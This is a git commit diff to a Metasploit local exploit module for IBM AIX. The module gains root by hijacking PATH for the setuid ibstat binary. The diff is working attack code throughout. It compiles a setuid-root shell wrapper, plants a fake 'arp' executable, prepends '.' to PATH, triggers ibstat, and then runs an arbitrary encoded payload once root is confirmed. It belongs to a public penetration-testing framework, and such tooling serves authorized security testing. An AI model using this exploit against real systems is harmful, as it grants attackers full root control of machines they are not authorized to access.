Switch post module to fixed exploit module.

2014-03-02 17:42:48 +02:00 · 2014-03-02 17:42:48 +02:00 · e6c1dd3f9e
parent 1d9e788649
commit e6c1dd3f9e
1 changed files with 45 additions and 28 deletions
--- a/modules/exploits/aix/local/ibstat_path.rb
+++ b/modules/exploits/aix/local/ibstat_path.rb
@ -17,8 +17,8 @@ class Metasploit4 < Msf::Exploit::Local
        'Author'         =>
        [
          'Kristian Erik Hermansen', #original author
-          'Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>', #msf module
-          'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>', #msf module
+          'Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>', #Metasploit module
+          'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>', #Metasploit module
        ],
        'References'     =>
        [
@ -28,14 +28,21 @@ class Metasploit4 < Msf::Exploit::Local
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827' ],
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756' ]
        ],
-        'Platform'      => [ 'aix' ],
-        'Arch'          => [ 'ppc' ],
-        'Targets'         =>
+        'Platform'      => [ 'unix' ],
+        'Arch'          => ARCH_CMD,
+        'Payload'       =>
+        {
+          'Compat'      =>  
+          {
+            'PayloadType' => 'cmd',
+            'RequiredCmd' => 'perl',
+          }
+        },
+        'Targets'       =>
        [
          [ 'IBM AIX Version 6.1', {} ],
          [ 'IBM AIX Version 7.1', {} ],
        ],
-        'RequiredCmd'   => 'generic',
        'DefaultTarget' => 1,
        'DisclosureDate'=>  "Sep 24 2013",
      ))
@ -45,11 +52,11 @@ class Metasploit4 < Msf::Exploit::Local
  end

  def check
-      ls_output = cmd_exec "find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null"
-      if ls_output.include? ("ibstat")
-          return Exploit::CheckCode::Vulnerable
-      end
-      Exploit::CheckCode::Safe
+    ls_output = cmd_exec "find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null"
+    if ls_output.include? ("ibstat")
+        return Exploit::CheckCode::Vulnerable
+    end
+    Exploit::CheckCode::Safe
  end

  def exploit
@ -67,7 +74,7 @@ int main()
 {
   setreuid(0,0);
   setregid(0,0);
-   execve("/bin/sh",NULL.NULL);
+   execve("/bin/sh",NULL,NULL);
   return 0;
 }
 ^
@ -92,40 +99,50 @@ chmod 4555 #{root_file}
    write_file("#{arp_file}",arp)
    cmd_exec "chmod 0555 #{arp_file}"
    print_status("Custom arp file written")
-    print_status("Updating PATH environment variable...")
+    print_status("Updating $PATH environment variable...")
+    path_env = cmd_exec 'echo $PATH'
    cmd_exec 'PATH=.:$PATH'
    cmd_exec 'export PATH'
    print_status("Triggering vulnerablity...")
    cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
    print_status("Removing custom arp...")
    file_rm("#{arp_file}")
+    print_status('Restoring $PATH environment variable...')
+    cmd_exec "PATH=#{path_env}"
+    cmd_exec 'export PATH'
    cmd_exec "#{root_file}"
    print_status("Checking root privileges...")
-    is_root?
+    if is_root?
+      print_status("Executing payload...")
+      cmd_exec "#{payload.encoded}"
+    end
  end

  def gcc_installed?
-      print_status("Checking if gcc exists...")
-      gcc_version = cmd_exec 'gcc -v'
-      gcc_array = gcc_version.split("\n")
-      gcc_array.each do |res|
-        if res.include? ("gcc version")
-          print_good("gcc found! (#{res})")
-          return true
-        end
+    print_status("Checking if gcc exists...")
+    gcc_version = cmd_exec 'gcc -v'
+    gcc_array = gcc_version.split("\n")
+    gcc_array.each do |res|
+      if res.include? ("gcc version")
+        print_good("gcc found! (#{res})")
+        return true
      end
-      print_status("gcc not found. Using /bin/sh from local system")
-      false
+    end
+    print_status("gcc not found. Using /bin/sh from local system")
+    false
  end

  def is_root?
    id_output = cmd_exec "id"
    if id_output.include? ("euid=0(root)")
      print_good("Got root! (euid)")
-    elsif id_output.include?("uid=0(root)")
-      print_good("Got root!")
-    else
-      print_status("Exploit failed")
+      return true
    end
+    if id_output.include?("uid=0(root)")
+      print_good("Got root!")
+      return true
+    end
+    print_status("Exploit failed")
+    false
  end
 end